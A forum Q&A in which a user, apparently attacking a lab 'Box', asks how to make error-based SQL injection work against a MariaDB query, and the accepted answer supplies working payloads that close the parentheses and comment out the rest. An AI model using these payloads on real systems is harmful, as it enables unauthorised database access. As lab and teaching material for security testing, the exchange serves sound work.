# How to find out the right syntax in MariaDB Error Based SQL Injection?

Tags: syntax, mariadb, sql-injection

I am trying to inject SQL statements into a Box. 
I have the following injection point:

```
example.com/?o=1&page=app
```

when I inject 1' then I receive the following error message:

```
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1
```

I was trying to inject the following:

```
1' ORDER BY 1 --
```

I still get error message and I don't know how to close the statement:

```
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'ORDER BY 1 --') and ( dest like '5' or dest like '1' ORDER BY 1 --') LIMIT 10' at line 1
```

What I am doing wrong?
Thanks for the answers!

Answer (score 0, accepted):

Given that when you tried `1'` the query included `'1''` it seems that the original query is something like this:

```
... '5' or dest like '$o') LIMIT 10
```

e.g.

```
SELECT * FROM table WHERE (category = '5' or dest like '$o') LIMIT 10
```

To get this to be a valid query you'd need to close the parentheses.

So e.g. `%') --`, giving:

```
SELECT * FROM table WHERE (category = '5' or dest like '%') --') LIMIT 10
```

or `%' OR '' = '`, giving:

```
SELECT * FROM table WHERE (category = '5' or dest like '%' OR '' = '') LIMIT 10
```

Comment: Should we really be training the world on how to do SQL Injection?

Comment: Maybe teach the world how to test SQLi and how to prevent it.